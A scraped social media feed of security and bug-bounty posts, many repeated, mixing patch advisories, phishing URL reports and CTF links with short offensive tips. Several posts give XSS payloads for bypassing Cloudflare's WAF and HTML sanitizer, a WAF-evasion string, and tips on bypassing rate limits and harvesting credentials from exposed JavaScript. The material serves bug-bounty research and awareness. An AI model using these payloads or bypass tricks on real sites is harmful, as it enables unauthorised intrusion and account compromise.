Who made this lol #cybersecurity #infosec

payloadartist's tweet image. Who made this lol

#cybersecurity #infosec

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS" payload: '<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

viehgroup's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/ 

#infosec #cybersec #bugbountytips

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

🚨 Exploit alert: CVE 2025 53770 repo is live on GitHub. Running vulnerable software? Patch or you might become the next lab rat in the cyber maze 🐀🛡️ Thoughts? Reply! #CyberSec #InfoSec #Cybersecurity #Vulnerability #PatchNow #GitHubExploit #ZeroDay #ThreatIntel


Who thought a simple JPG could sneak in as a phishing page? 🖼️ Cache smuggling tricks CDNs into serving the wrong content. Lock those cache keys, honor Cache-Control, and purge after auth. Got thoughts? expel.com/blog/cache-smu… #Cybersecurity #Tech #InfoSec #AppSec #CacheSecurity


Heads up: Oracle CVE 2025 61884 leaves the door open for uninvited guests. Patch fast, rotate those creds, and lock down your systems. No party crashers allowed 🎉🔐 Thoughts? Reply! #CyberSec #InfoSec #Oracle #Cybersecurity #Tech #ITSecurity #Vulnerability #PatchManagement


How often do you check sender emails carefully? Awareness = protection! #InfoSec #CyberAware #DigitalSafety


🚨 #phishing report issued 🚨 🌐 Suspected URL: https://regowex[.]com/ 🔎 Analysis: urlscan.io/result/0199dce… 🔒 #InfoSec 🛡️ @CloudflareHelp @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: https://regowex[.]com/
🔎 Analysis: urlscan.io/result/0199dce…

🔒 #InfoSec
🛡️ @CloudflareHelp @Phish_Destroy

🚨 #phishing report issued 🚨 🌐 Suspected URL: https://niosax[.]com/ 🔎 Analysis: urlscan.io/result/0199dcd… 🔒 #InfoSec 🛡️ @CloudflareHelp @Phish_Destroy

CarlyGriggs13's tweet image. 🚨 #phishing report issued 🚨
🌐 Suspected URL: https://niosax[.]com/
🔎 Analysis: urlscan.io/result/0199dcd…

🔒 #InfoSec
🛡️ @CloudflareHelp @Phish_Destroy

Old SonicWall bug CVE 2024 40766 just got a new lease on life thanks to Akira and the sneaky unpac the hash trick. Time to patch. Rotate those creds. Segment your network like a pro 🔐 Got tips? Share them! #CyberSec #InfoSec #Cybersecurity #NetworkSecurity #Ransomware


CTF Spotlight — THREE (HTB): misconfigured S3 → uploaded PHP webshell → RCE. Lock object stores & validate uploads. #HackTheBox #CTF #Infosec #RCE Medium -->medium.com/p/hackthebox-w…

Cypher_1ne's tweet image. CTF Spotlight — THREE (HTB): misconfigured S3 → uploaded PHP webshell → RCE. Lock object stores &amp;amp; validate uploads. #HackTheBox #CTF #Infosec #RCE
Medium --&amp;gt;medium.com/p/hackthebox-w…

🚨 Found the perfect XSS but hit a CSP wall? That error message isn't game over—it's an invitation. I just dropped Part 1 of my CSP Bypass series: the fundamentals that work on 70-80% of policies in the wild. #bugbounty #infosec Thread breakdown 🧵👇 medium.com/@Aacle/a-bug-h…


🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners PDF: 0xinfection.github.io/reversing/reve… author: @0xInfection #infosec #reverseengineering

mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering
mqst_'s tweet image. 🧰 Beginners Guide: Comprehensive Reverse Engineering Tutorials for Beginners

PDF: 0xinfection.github.io/reversing/reve…

author: @0xInfection 

#infosec #reverseengineering

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

[Blog] my journey as a @Microsoft Security Researcher! 🚀 Tips, learnings & insights for anyone aspiring to land their dream role in cybersecurity. 🔗 shreyapohekar.com/blogs/landing-… #Microsoft #Infosec #FreshersInTech #SecurityResearch #security

shreyapohekar's tweet image. [Blog] my journey as a @Microsoft  Security Researcher! 🚀
Tips, learnings &amp;amp; insights for anyone aspiring to land their dream role in cybersecurity.
🔗 shreyapohekar.com/blogs/landing-…

#Microsoft #Infosec #FreshersInTech #SecurityResearch #security

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

Who made this lol #cybersecurity #infosec

payloadartist's tweet image. Who made this lol

#cybersecurity #infosec

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

Remote code execution exploit on the Synology TC500 smart camera by @infosectcbr blog.infosectcbr.com.au/2025/08/01/exp… #infosec #embedded

0xor0ne's tweet image. Remote code execution exploit on the Synology TC500 smart camera by @infosectcbr

blog.infosectcbr.com.au/2025/08/01/exp…

#infosec #embedded

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

Loading...

Something went wrong.


Something went wrong.


United States Trends